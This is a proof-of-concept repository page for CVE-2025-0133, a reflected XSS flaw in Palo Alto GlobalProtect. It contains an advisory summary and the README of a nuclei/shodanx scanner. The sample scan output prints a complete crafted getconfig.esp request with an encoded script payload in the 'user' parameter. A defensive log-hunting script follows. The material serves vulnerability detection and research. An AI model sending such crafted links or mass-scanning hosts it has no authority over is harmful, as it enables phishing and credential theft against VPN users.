CVE-2025-0133 PoC — PAN-OS: Reflected Cross-Site Scripting (XSS) Vulnerability in GlobalProtect Gateway and Portal

Source
Associated Vulnerability
Title: PAN-OS: Reflected Cross-Site Scripting (XSS) Vulnerability in GlobalProtect Gateway and Portal (CVE-2025-0133)
Description: A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user's browser when they click on a specially crafted link. The primary risk is phishing attacks that can lead to credential theft—particularly if you enabled Clientless VPN. There is no availability impact to GlobalProtect features or GlobalProtect users. Attackers cannot use this vulnerability to tamper with or modify contents or configurations of the GlobalProtect portal or gateways. The integrity impact of this vulnerability is limited to enabling an attacker to create phishing and credential-stealing links that appear to be hosted on the GlobalProtect portal. For GlobalProtect users with Clientless VPN enabled, there is a limited impact on confidentiality due to inherent risks of Clientless VPN that facilitate credential theft. You can read more about this risk in the informational bulletin PAN-SA-2025-0005 (https://security.paloaltonetworks.com/PAN-SA-2025-0005). There is no impact to confidentiality for GlobalProtect users if you did not enable (or you disable) Clientless VPN.
Description
Reflected XSS vulnerability found in Palo Alto GlobalProtect Gateway & Portal. Attackers can inject malicious scripts via crafted requests. 
Readme
# CVE-2025-0133 Vulnerability Scanner

A Bash-based automated scanner tool for detecting the **CVE-2025-0133** Reflected XSS vulnerability in **Palo Alto GlobalProtect Gateway & Portal** using `nuclei` and `shodanx`.

---

**Author**:  
<p align="center">
  <a href="https://github.com/INTELEON404">
    <img title="Github" src="https://img.shields.io/badge/INTELEON404-red?style=for-the-badge&logo=github">
  </a>
</p>

**Date**: 2025-06-23  
**Severity**: Medium  
**CVE ID**: CVE-2025-0133  
**Vulnerability Type**: Reflected Cross-Site Scripting (XSS)  
**Tested Against**: Palo Alto Networks GlobalProtect Portal (PAN-OS)  

---

## Overview

This tool helps penetration testers and security researchers quickly identify vulnerable domains or IPs related to the CVE-2025-0133 issue.  
It leverages `nuclei` templates and Shodan query integration (`shodanx`) to find and scan targets efficiently.

---

## Features

- Automatically detects if input is a single domain or a file containing multiple domains/IPs  
- Runs `shodanx` on single domains to gather related hosts  
- Uses `nuclei` with a custom CVE-2025-0133 template to scan targets  
- Displays scan results in a clean tabular format on the command line  
- Shows scan start and end times  
- Prompts to save results in both `.txt` and `.json` formats  
- Built-in help and usage instructions

---

## Requirements

- Linux environment with Bash shell  
- [nuclei](https://nuclei.projectdiscovery.io/) installed and accessible in `$PATH`  
- [shodanx](https://github.com/RevoltSecurities/ShodanX) installed and configured  
- The `CVE-2025-0133` nuclei template file located at:  
  `/home/user/nuclei-templates/http/cves/2025/CVE-2025-0133.yaml` (update path as needed)
  
## 📦 Required Tools Installation

### 🔹 1. Install [ShodanX](https://github.com/RevoltSecurities/ShodanX)

```bash
pip install git+https://github.com/RevoltSecurities/ShodanX 
```
> **If pip reports** `error: externally-managed-environment`, run:

```bash
pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages
```

> ⚠️ **Note:**
> The `--break-system-packages` option is needed on some systems (especially Debian/Ubuntu) where the system Python is marked as externally managed, so that pip will install packages outside a virtual environment. Installing inside a virtual environment avoids the need for this flag.

👉 Make sure `shodanx` is available in your `$PATH`.
You can test it with:

```bash
shodanx -h
```

### 🔹 2. Install [Nuclei](https://github.com/projectdiscovery/nuclei)

```bash
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
```

Check if installed:

```bash
nuclei -version
```

Then update the templates:

```bash
nuclei -update-templates
```

---

## Usage

```bash
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh -h 
Usage: ./cve20250133.sh <domain-or-file>

Scan CVE-2025-0133 vulnerabilities using nuclei and shodanx.
If input is a file, scan domains/IPs from the file.
If input is a domain, run shodanx to find related IPs/domains and scan them.

Options:
  -h, --help, help     Show this help message and exit.

```

---

## Examples

### Scan a single domain

```bash
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh domain.com
Scan Start Time: 2025-06-24 16:33:51


▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  █▌▟▖▄▌▄▌
                          
-INTELEON404


[✔] Input is a single domain: domain.com — Running ShodanX first
     _                               _      
    | |            |                (_\  /  
 ,  | |     __   __|   __,   _  _      \/   
/ \_|/ \   /  \_/  |  /  |  / |/ |     /\   
 \/ |   |_/\__/ \_/|_/\_/|_/  |  |_/ _/  \_/
                                            
                                            

                     - RevoltSecurities

[version]:shodanx current version v1.1.1 (latest)
[*] Scanning domain 123.45.67.890...

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

        projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 850.496188ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------
```

### Scan from a file

```bash
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh file.txt       
Scan Start Time: 2025-06-24 16:36:37


▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  █▌▟▖▄▌▄▌
                          
-INTELEON404


[✔] Input is a file: file.txt — Skipping ShodanX
[*] Scanning domain 123.45.67.890 ...

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

        projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 28.825193ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------
```

---

## CVE-2025-0133 Details

CVE-2025-0133 is a reflected Cross-Site Scripting (XSS) vulnerability in the Palo Alto GlobalProtect Gateway & Portal that allows attackers to inject malicious scripts via crafted requests.
To mitigate this issue, patch your systems by updating to the latest Palo Alto Networks releases.
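
For defenders, the request shape shown in the scan output above (`/ssl-vpn/getconfig.esp` with markup in the `user` parameter) can be hunted for in portal or reverse-proxy access logs. The following Python is an added example, not part of this repository; the combined log format, the markup heuristic, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint taken from the scanner output on this page.
TARGET_PATH = "/ssl-vpn/getconfig.esp"
# Assumed heuristic: tag openers or javascript: URIs never belong in these parameters.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|javascript:", re.I)
# Assumed input: combined-format access log lines from the portal or a proxy in front of it.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def decode_fully(value, rounds=3):
    """Undo nested percent-encoding so double-encoded markup is still seen."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def suspicious_params(url):
    """Return the query parameters on TARGET_PATH whose decoded value has markup."""
    parts = urlsplit(url)
    if parts.path.lower() != TARGET_PATH:
        return []
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    return [name for name, value in pairs if MARKUP.search(decode_fully(value))]


def scan_log(lines):
    """Return (client_ip, status, parameter_names) for each flagged request."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        params = suspicious_params(m.group(2)) if m else []
        if params:
            findings.append((m.group(1), int(m.group(3)), params))
    return findings


# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Jun/2025:16:33:52 +0000] "GET /ssl-vpn/getconfig.esp?client-type=1&user=alice&computer=laptop01 HTTP/1.1" 200 512',
    '203.0.113.9 - - [24/Jun/2025:16:34:10 +0000] "GET /ssl-vpn/getconfig.esp?user=%3Csvg%3E%3Cscript%3Eprompt(1)%3C%2Fscript%3E%3C%2Fsvg%3E HTTP/1.1" 200 733',
    '203.0.113.9 - - [24/Jun/2025:16:34:11 +0000] "GET /ssl-vpn/getconfig.esp?user=%253Csvg%253E HTTP/1.1" 200 120',
    '192.0.2.44 - - [24/Jun/2025:16:35:02 +0000] "GET /global-protect/login.esp?x=%3Cb%3E HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for client, status, params in scan_log(SAMPLE_LOG):
        print(f"{client} status={status} markup in: {', '.join(params)}")
```

A flagged line shows that a crafted link was requested, not that script ran in a browser; correlate the client address and timestamp with authentication logs before drawing conclusions.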

---

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

File Snapshot

```
[4.0K] /data/pocs/4e5c2cb7c0b6e7a460bcf47a4403ead0fb9f21af
├── [3.5K] cve20250133.sh
├── [1.0K] LICENSE
└── [7.1K] README.md

0 directories, 3 files
```